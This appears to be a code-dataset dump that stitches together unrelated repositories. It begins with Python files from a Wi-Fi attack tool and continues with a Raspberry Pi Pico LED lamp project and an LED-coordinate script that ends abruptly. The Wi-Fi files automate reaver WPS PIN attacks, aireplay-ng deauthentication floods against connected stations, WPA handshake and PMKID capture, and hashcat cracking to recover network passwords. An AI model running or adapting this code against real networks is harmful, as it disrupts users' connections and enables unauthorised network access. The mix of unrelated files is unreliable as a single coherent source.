{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,408
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/hashcat.py
|
from wdcs import process
from wdcs.logger import Logger
class Hashcat(object):
def __init__(self, config):
self.config = config
pass
def crack_pmkid(self, filepath):
return self.__crack(filepath, "16800")
def crack_4hs(self, filepath):
return self.__crack(filepath, "2500")
def __crack(self, filepath, type):
try:
p = process.Process.start_process_stdout(["hashcat", "--force", "-a", "0", "-m", type, filepath, self.config.hashcat_dictionary])
p.wait(300)
except TimeoutError:
Logger.log("hashcat takes too long.")
finally:
p.kill()
return self.__check_result(filepath, type)
def __check_result(self, filepath, type):
p = process.Process.start_process_pipe(["hashcat", "--show", "-m", type, filepath])
out = p.communicate()[0].decode("utf-8")
try:
return out.split("\n")[0].split(":")[-1]
except IndexError:
Logger.log("Invalid hashcat output: {}".format(out))
return None
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,409
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/crack.py
|
from wdcs.basicutils import *
from wdcs.logger import Logger
from timeit import default_timer as timer
from wdcs import timeutils
import sys
import traceback
import time
import string
import random
class CrackSuccess(Exception):
pass
class CrackSuccessNoPsk(CrackSuccess):
pass
class NoStations(Exception):
pass
class WpsCracker(object):
def __init__(self, config, file_manager, database):
self.config = config
self.file_manager = file_manager
self.db = database
def crack(self, ap, pixie):
Logger.log("Starting Reaver (pixie={})...".format(pixie))
wps_pin = None
wpa_psk = None
p = None
try:
session_file = "/usr/local/var/lib/reaver/{}.wpc".format(ap.bssid)
if os.path.exists(session_file):
os.remove(session_file)
output_path = self.file_manager.filepath("reaver_{}_{}".format(ap.bssid, pixie))
pixie_cmd_param = "-K" if pixie else ""
p = Process.start_process_shell(
"reaver -i {} -b {} -c {} {} -N -vv >{} 2>&1".format(
self.config.iface, Bssid.make_colon_bssid(ap.bssid),
ap.channel, pixie_cmd_param, output_path))
start_time = timer()
reaver_done = False
total_count = 0
deauth_counter = 0
timeout_counter = 0
rate_limiting_counter = 0
while not reaver_done:
time.sleep(1)
with open(output_path) as rfile:
count = -1
for line in rfile:
count += 1
if count <= total_count:
continue
Logger.print_nolog(line.strip())
if not wps_pin and ("[+] WPS PIN:" in line or "[+] WPS pin:" in line):
Logger.log("Found PIN!")
try:
wps_pin = line.split(":")[1].strip()
if wpa_psk:
reaver_done = True
except:
Logger.log("Cannot parse PIN: {}".format(line.strip()))
reaver_done = True
elif not wpa_psk and "[+] WPA PSK:" in line:
Logger.log("Found PSK!")
try:
wpa_psk = line.split("'")[1].strip()
if wps_pin:
reaver_done = True
except:
Logger.log("Cannot parse PSK: {}".format(line.strip()))
reaver_done = True
elif "[+] Received deauth request" in line:
deauth_counter += 1
if deauth_counter == 5:
Logger.log("Too many deauths. Skipping...")
reaver_done = True
elif "[!] WARNING: Receive timeout occurred" in line:
timeout_counter += 1
if timeout_counter == 5:
Logger.log("Too many timeouts. Skipping...")
reaver_done = True
elif "[!] WARNING: Detected AP rate limiting" in line:
rate_limiting_counter += 1
if rate_limiting_counter == 2:
Logger.log("Rate limiting. Skipping...")
reaver_done = True
elif "[-] Pixiewps fail" in line:
Logger.log("Pixie failed")
reaver_done = True
total_count = count
if timer() - start_time > 600:
Logger.log("Reaver takes too long. Skipping...")
reaver_done = True
except:
Logger.log("Cannot crack with reaver! {}".format(traceback.format_exc()))
finally:
if p:
p.kill()
if wps_pin or wpa_psk:
print("Reaver result: WPS PIN = {}, WPA PSK = {}".format(wps_pin, wpa_psk))
ap.wps = wps_pin is not None
ap.psk = wpa_psk is not None
self.db.update_ap_wps(ap, wps_pin, wpa_psk)
raise CrackSuccess()
class WpaCrackUtils(object):
def __init__(self, file_manager, db, hashcat):
self.db = db
self.file_manager = file_manager
self.hashcat = hashcat
def extract_ap_station_communication_from_pcap(self, pcap_filename, ap_bssid_colon, station_bssid_colon):
filtered_pcap = self.file_manager.filepath(
"out_{}_{}.cap".format(Bssid.normalize_bssid(ap_bssid_colon), Bssid.normalize_bssid(station_bssid_colon)))
ap_station_only_filter = "((wlan.da == {} and wlan.sa == {}) or (wlan.sa == {} and wlan.da == {}))".format(
station_bssid_colon, ap_bssid_colon, station_bssid_colon, ap_bssid_colon)
pt = Process.start_process_pipe_stdout(
["tshark", "-r", pcap_filename, "-Y", ap_station_only_filter, "-F", "libpcap", "-w", filtered_pcap])
pt.wait()
return filtered_pcap
def read_and_crack_handshake(self, ap, pcap, airodump):
file_4hs = self.__read_handshake(ap, pcap, airodump)
if file_4hs:
psk = self.hashcat.crack_4hs(file_4hs)
if psk and len(psk) > 0:
Logger.log("Found PSK: {}, AP: {}".format(psk, ap.essid))
self.db.update_psk_for_bssid(ap.bssid, psk)
ap.psk = True
raise CrackSuccess
else:
raise CrackSuccessNoPsk
def __read_handshake(self, ap, pcap, airodump=None):
hs4_file = self.file_manager.filepath("4hs_{}".format(ap.bssid))
pa = Process.start_process_pipe(["aircrack-ng", "-b", Bssid.make_colon_bssid(ap.bssid), "-j", hs4_file, pcap])
time.sleep(2)
if pa.poll() is not None:
pa.kill()
try:
hs4_file_ext = "{}.hccapx".format(hs4_file)
with open(hs4_file_ext, "rb") as f:
data = f.read()
if len(data) > 0:
if airodump:
airodump.kill()
Logger.log("Handshake collected ({} bytes in {})".format(
len(data), self.file_manager.filename(hs4_file_ext)))
self.db.update_ap_wpa_handshake(ap, data)
ap.hs4 = True
return hs4_file_ext
else:
raise FileNotFoundError()
except FileNotFoundError:
Logger.log("WPA handshake not captured!")
return None
def read_tshark(self, filename, filter):
pt = Process.start_process_pipe_stdout(["tshark", "-n", "-r", filename, "-Y", filter, "-T", "tabs"])
messages = pt.communicate()[0].decode("utf-8")
return messages.split("\n")
def count_pmkid_messages(self, pcap_path):
aps = {}
lines = self.read_tshark(pcap_path, "eapol and wlan.rsn.ie.pmkid")
for m in [m for m in lines if "Message 1" in m]:
ap = Bssid.normalize_bssid(m.split("\t")[2])
if ap not in aps:
aps[ap] = 1
else:
aps[ap] += 1
return aps
def convert_and_crack_pcap_pmkid(self, ap, pcap_filepath):
file_pmkid = self.__convert_pcap_pmkid(ap, pcap_filepath)
if file_pmkid:
out = self.hashcat.crack_pmkid(file_pmkid)
if out and len(out) > 0:
Logger.log("Found PSK: {}, AP: {}".format(out, ap.essid))
self.db.update_psk_for_bssid(ap.bssid, out)
ap.psk = True
raise CrackSuccess
else:
raise CrackSuccessNoPsk
def __convert_pcap_pmkid(self, ap, pcap_filename):
pmkid_filename = self.file_manager.filepath("pmkid_{}.16800".format(ap.bssid))
ph = Process.start_process_pipe(
["hcxpcaptool", "--filtermac", ap.bssid, "-k", pmkid_filename, pcap_filename])
out = ph.communicate()[0].decode("utf-8")
Logger.log(out)
if "PMKID(s) written to" in out:
with open(pmkid_filename, "r") as pmkid_file:
pmkid = "".join(pmkid_file.readlines()).strip()
if len(pmkid) > 0:
Logger.log("PMKID collected ({})".format(self.file_manager.filename(pmkid_filename)))
self.db.update_ap_pmkid(ap, pmkid)
ap.pmkid = True
return pmkid_filename
else:
ap.pmkid = None
Logger.log("Problem with converting - empty PMKID")
else:
Logger.log("Problem with converting {}".format(self.file_manager.filename(pcap_filename)))
return None
class WpaPmkidCracker(object):
def __init__(self, file_manager, crack_utils, config):
self.file_manager = file_manager
self.crack_utils = crack_utils
self.config = config
def crack_wpa_pmkid(self, ap):
Logger.log("Trying to get PMKID...")
pw = None
airodump = None
try:
airodump = AirodumpProcess(self.config.iface, self.file_manager, ap)
rnd_password = "".join(random.sample(string.ascii_letters,8)) #value doesnt matter
pw = WpaSupplicant.connect_wpa(ap, rnd_password, self.config, self.file_manager, second_iface=True)
time.sleep(5)
tries = 6
while tries > 0:
tries -= 1
time.sleep(30)
messages_count = self.crack_utils.count_pmkid_messages(airodump.pcap_filepath)
if len(messages_count) < 1 or ap.bssid not in messages_count:
continue
messages_count = messages_count[ap.bssid]
Logger.log("Gathered {} M1 messages".format(messages_count))
if messages_count > 0:
tries = 0
Logger.log("Convert pcap")
self.crack_utils.convert_and_crack_pcap_pmkid(ap, airodump.pcap_filepath)
except CrackSuccess as e:
raise e
except:
Logger.log("Cannot find PMKID! {}".format(traceback.format_exc()))
finally:
if airodump:
airodump.kill()
if pw:
pw.kill()
class WpaHandshakeCracker(object):
def __init__(self, config, crack_utils, file_manager):
self.config = config
self.crack_utils = crack_utils
self.file_manager = file_manager
def crack_wpa_handshake(self, ap, stations, deauth=False):
Logger.log("Trying to get WPA handshake")
airodump = None
try:
if len(stations) == 0:
raise NoStations()
airodump = AirodumpProcess(self.config.iface, self.file_manager, ap)
tries = 0
tries_limit = (len(stations) * self.config.TRIES_PER_STATION) if deauth else self.config.TRIES_LIMIT_NO_DEAUTH
Logger.log("tries limit {}".format(tries_limit))
while tries < tries_limit:
if deauth:
station = stations[int(tries / self.config.TRIES_PER_STATION)]
station_try = ((tries % self.config.TRIES_PER_STATION) + 1)
Logger.log("Start deauth AP: {}, Station: {}".format(ap.bssid, station))
deauth_count = self.config.DEAUTH_COUNT_BASE * station_try
ap_bssid_colon = Bssid.make_colon_bssid(ap.bssid)
station_bssid_colon = Bssid.make_colon_bssid(station)
pd = Process.start_process_devnull(
["aireplay-ng", "--deauth", str(deauth_count), "-a", ap_bssid_colon, "-c", station_bssid_colon,
self.config.iface])
pd.wait()
Logger.log("Stop deauth")
time.sleep(self.config.SLEEP_AFTER_DEAUTH_BASE * station_try) # let give the victim time for reconnect
pt = Process.start_process_pipe_stdout(["tshark", "-r", airodump.pcap_filepath, "-Y",
"eapol and (wlan.sa == {} or wlan.da == {})".format(
Bssid.make_colon_bssid(ap.bssid),
Bssid.make_colon_bssid(ap.bssid))])
out = pt.communicate()[0].decode("utf-8")
if ("(Message 1 of 4)" in out or "(Message 3 of 4)" in out) and "(Message 2 of 4)" in out:
Logger.log("EAPOL messages gathered.")
pcap = airodump.pcap_filepath
if deauth:
pcap = self.crack_utils.extract_ap_station_communication_from_pcap(
airodump.pcap_filepath, ap_bssid_colon, station_bssid_colon)
self.crack_utils.read_and_crack_handshake(ap, pcap, airodump)
else:
Logger.log("No EAPOL messages yet...")
if not deauth:
time.sleep(self.config.SLEEP_NO_DEAUTH)
tries += 1
except CrackSuccess as e:
raise e
except NoStations as e:
raise e
except:
Logger.log("Cannot get WPA handshake! {}".format(traceback.format_exc()))
finally:
if airodump:
airodump.kill()
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,410
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/utils.py
|
import math
import random
from color import Color
def blendChannel(a, b, t):
if t == 0:
return a
elif t == 1:
return b
else:
return int(math.sqrt((1 - t) * a**2 + t * b**2))
def bound(value, smallest, largest):
return min(max(value, smallest), largest)
def getNewRandomColor(previous):
color = None
while color == None or previous == color:
color = Color.ALL[random.randint(0, len(Color.ALL) - 1)]
return color
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,411
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/baseEffect.py
|
import time
from leds import LedStripControl
from button import Button, ButtonCommand
class BaseEffect:
button: Button
ledStrip: LedStripControl
isInfinite: bool
loopInterval: int
def __init__(self, ledStrip: LedStripControl, button: Button, isInfinite: bool = True, loopInterval: int = 10) -> None:
self.ledStrip = ledStrip
self.button = button
self.isInfinite = isInfinite
self.loopInterval = loopInterval
def setup(self):
pass
def loop(self):
pass
def run(self) -> int:
self.setup()
while self.isInfinite:
buttonResult = self.button.fetchCommand()
if buttonResult != ButtonCommand.NONE:
self.ledStrip.clear()
return buttonResult
self.loop()
time.sleep_ms(self.loopInterval)
return ButtonCommand.NONE
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,412
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/lambdaColor.py
|
from .baseEffect import BaseEffect
from button import Button
from color import Color
from leds import LedStripControl, NUM_LEDS
from utils import blendChannel, bound
import time
import random
class AnimationState:
WAITING = 0
ANIMATING = 1
class LambdaColor(BaseEffect):
# colorGetter: function
animationDuration: int
waitLow: int
waitHigh: int
def __init__(self, ledStrip: LedStripControl, button: Button, colorGetter, animationDuration: int, waitLow: int, waitHigh: int) -> None:
super().__init__(ledStrip, button)
self.colorGetter = colorGetter
self.animationDuration = animationDuration
self.waitLow = waitLow
self.waitHigh = waitHigh
self.ledState = []
def setup(self):
for i in range(NUM_LEDS):
self.ledState.append([
AnimationState.WAITING,
time.ticks_ms() + random.randint(500, 5000),
self.colorGetter(Color.BLACK),
Color.BLACK,
])
def loop(self):
now = time.ticks_ms()
for i in range(NUM_LEDS):
led = self.ledState[i]
if led[0] == AnimationState.WAITING and led[1] < now:
# Begin animating
led[0] = AnimationState.ANIMATING
led[1] = now + self.animationDuration # end animating in 1 second
led[3] = self.colorGetter(led[2])
if led[0] == AnimationState.ANIMATING:
if led[1] < now:
# Stop animating
led[0] = AnimationState.WAITING
led[1] = now + random.randint(self.waitLow, self.waitHigh)
led[2] = led[3]
led[3] = Color.BLACK
if led[0] == AnimationState.WAITING:
self.ledStrip.setLed(i, led[2])
elif led[0] == AnimationState.ANIMATING:
transitionPercent = 1 - bound((led[1] - now) / self.animationDuration, 0, 1)
color = [blendChannel(led[2][j], led[3][j], transitionPercent) for j in range(3)]
self.ledStrip.setLed(i, color)
self.ledStrip.refresh()
time.sleep_ms(10)
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,413
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/main.py
|
import time
from leds import LedStripControl
from button import ButtonCommand, Button
from color import Color
import effects
LEDSTRIP_DATA_PIN = 28
BUTTON_PIN = 27
ledStrip = LedStripControl(LEDSTRIP_DATA_PIN)
button = Button(BUTTON_PIN)
effectFns: list = [
effects.ProximaPlane(ledStrip, button),
effects.WipePlane(ledStrip, button),
effects.BiColor(ledStrip, button, Color.PURPLE, Color.CYAN),
effects.BiColor(ledStrip, button, Color.GREEN, Color.PURPLE),
effects.BiColor(ledStrip, button, Color.WHITE, Color.GREEN),
effects.RainbowStars(ledStrip, button),
]
def loopEffects():
while True:
for effectFn in effectFns:
buttonCmd = effectFn.run()
if buttonCmd == ButtonCommand.OFF:
return
def waitForButton():
print("BEGIN: wait for button")
while True:
if button.fetchCommand() == ButtonCommand.NEXT:
return
time.sleep_ms(200)
while True:
loopEffects()
waitForButton()
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,414
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/color.py
|
class Color:
BLACK = (0, 0, 0)
RED = (255, 0, 0)
YELLOW = (255, 150, 0)
GREEN = (0, 255, 0)
CYAN = (0, 255, 255)
BLUE = (0, 0, 255)
PURPLE = (180, 0, 255)
WHITE = (255, 255, 255)
ALL = (RED, YELLOW, GREEN, CYAN, BLUE, PURPLE, WHITE)
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,415
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/button.py
|
import time
from machine import Pin, Timer
class ButtonCommand:
NONE = 0
NEXT = 1
OFF = 2
class Button:
__btn: Pin
__riseStart: int
__isDown: bool
__command: int
__checkTimer: Timer
__holdTimer: Timer
def __init__(self, pin: int) -> None:
self.__btn = Pin(pin, Pin.IN, Pin.PULL_DOWN)
self.__btn.irq(trigger=Pin.IRQ_FALLING | Pin.IRQ_RISING, handler=self.buttonCallback)
self.__riseStart = 0
self.__isDown = False
self.__command = ButtonCommand.NONE
self.__checkTimer = Timer()
self.__holdTimer = Timer()
def buttonRising(self) -> None:
t = time.ticks_ms()
if t - self.__riseStart < 400:
return
self.__riseStart = t
self.__isDown = True
self.__checkTimer.deinit()
self.__checkTimer.init(period=100, mode=Timer.ONE_SHOT, callback=self.checkTimerCallback)
self.__holdTimer.deinit()
self.__holdTimer.init(period=500, mode=Timer.ONE_SHOT, callback=self.holdTimerCallback)
def buttonFalling(self) -> None:
if not self.__isDown:
return
t = time.ticks_ms()
msSinceRise = t - self.__riseStart
if msSinceRise < 40:
return # Assume pin is still bouncing
# elif msSinceRise > 500:
# print("registering button up (long)")
# self.__command = ButtonCommand.OFF
else:
print("button up, registering next command")
self.__command = ButtonCommand.NEXT
self.__holdTimer.deinit()
self.__isDown = False
def buttonCallback(self, p) -> None:
if p.value():
self.buttonRising()
else:
self.buttonFalling()
def checkTimerCallback(self, timer) -> None:
if not self.__btn.value():
print("check timer check failed, ignoring button down")
self.__holdTimer.deinit()
self.__isDown = False
def holdTimerCallback(self, timer) -> None:
print("timer elapsed, registering off command")
self.__command = ButtonCommand.OFF
self.__isDown = False
# Get the current command and reset it to none
def fetchCommand(self) -> int:
cmd = self.__command
self.__command = ButtonCommand.NONE
return cmd
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,416
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/__init__.py
|
from .biColor import BiColor
from .rainbowStars import RainbowStars
from .wipePlane import WipePlane
from .proximaPlane import ProximaPlane
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,417
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/rainbowStars.py
|
from .lambdaColor import LambdaColor
from leds import LedStripControl
from button import Button
from utils import getNewRandomColor
class RainbowStars(LambdaColor):
def __init__(self, ledStrip: LedStripControl, button: Button) -> None:
def colorGetter(prev):
return getNewRandomColor(prev)
super().__init__(ledStrip, button, colorGetter, 4000, 500, 2000)
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,418
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/leds.py
|
import array
from machine import Pin
import rp2
LED_POSITIONS = ((-109, -53, -30), (-5, -53, -30), (-65, 37, 74), (-109, -67, 74), (99, 37, 74), (55, -67, 0), (-109, 37, -74), (-35, -7, -74), (69, -7, -74), (-109, 23, -30), (-35, -17, -30), (69, -17, -30), (109, 23, -30), (35, 67, 0))
NUM_LEDS = len(LED_POSITIONS)
RANGE_X = (-109, 109)
RANGE_Y = (-67, 67)
RANGE_Z = (-74, 74)
AXIS_RANGES = (RANGE_X, RANGE_Y, RANGE_Z)
class LedStripControl:
sm: rp2.StateMachine
ar = array.array("I", [0 for _ in range(NUM_LEDS)])
globalBrightness: int = 1
def __init__(self, dataPinNum) -> None:
@rp2.asm_pio(sideset_init=rp2.PIO.OUT_LOW, out_shiftdir=rp2.PIO.SHIFT_LEFT, autopull=True, pull_thresh=24)
def ws2812():
T1 = 2
T2 = 5
T3 = 3
wrap_target()
label("bitloop")
out(x, 1) .side(0) [T3 - 1]
jmp(not_x, "do_zero") .side(1) [T1 - 1]
jmp("bitloop") .side(1) [T2 - 1]
label("do_zero")
nop() .side(0) [T2 - 1]
wrap()
# Create the StateMachine with the ws2812 program, outputting on pin
self.sm = rp2.StateMachine(0, ws2812, freq=8_000_000, sideset_base=Pin(dataPinNum))
self.sm.active(1)
def refresh(self):
dimmer_ar = array.array("I", [0 for _ in range(NUM_LEDS)])
for i,c in enumerate(self.ar):
r = int(((c >> 8) & 0xFF) * self.globalBrightness)
g = int(((c >> 16) & 0xFF) * self.globalBrightness)
b = int((c & 0xFF) * self.globalBrightness)
dimmer_ar[i] = (g<<16) + (r<<8) + b
self.sm.put(dimmer_ar, 8)
#time.sleep_ms(10)
def setLed(self, i, color):
self.ar[i] = (color[1]<<16) + (color[0]<<8) + color[2]
def clear(self):
for i in range(NUM_LEDS):
self.setLed(i, (0, 0, 0))
self.refresh()
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,419
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/light-coords.py
|
### Script for calculating end positions of LED tree given sequence of joined parts and known lengths of parts
LEFT = "left"
RIGHT = "right"
UP = "up"
DOWN = "down"
IN = "in"
OUT = "out"
STRAIGHT = "straight"
LONGSTRAIGHT = "longstraight"
class v:
turnHalf = 13
straight = 40
longstraight = 80
connect = 4
facingMap = { # Index of dimension (x, y, z) and direction in dimension
RIGHT: (0, 1),
LEFT: (0, -1),
UP: (1, 1),
DOWN: (1, -1),
IN: (2, 1),
OUT: (2, -1),
}
def __init__(self, x, y, z, facing):
self.x = x
self.y = y
self.z = z
self.facing = facing
def __add__(self, dir):
plot = [self.x, self.y, self.z]
currentFacingData = self.facingMap[self.facing]
# Add connector length
plot[currentFacingData[0]] += self.connect * currentFacingData[1]
if dir == STRAIGHT or dir == LONGSTRAIGHT:
# Add in direction of current facing
plot[currentFacingData[0]] += (self.straight if dir == STRAIGHT else self.longstraight) * currentFacingData[1]
dir = self.facing
else:
# We're turning so add half turn in current facing, then another half turn in new facing
newFacingData = self.facingMap[dir]
plot[currentFacingData[0]] += self.turnHalf * currentFacingData[1]
plot[newFacingData[0]] += self.turnHalf * newFacingData[1]
return v(
*plot,
dir,
)
def __repr__(self):
return "(%s, %s, %s, %s)" % (self.x, self.y, self.z, self.facing)
def endpoint(self):
return (self.x, self.y, self.z)
t0 = v(-5, -111, 0, UP) # Root coordinate adjusted so all LEDs are centered around 0,0,0
tA = t0 + LONGSTRAIGHT
tAA = tA + LEFT + STRAIGHT + OUT + DOWN
tB = tA + UP
tBA = tB + IN + STRAIGHT
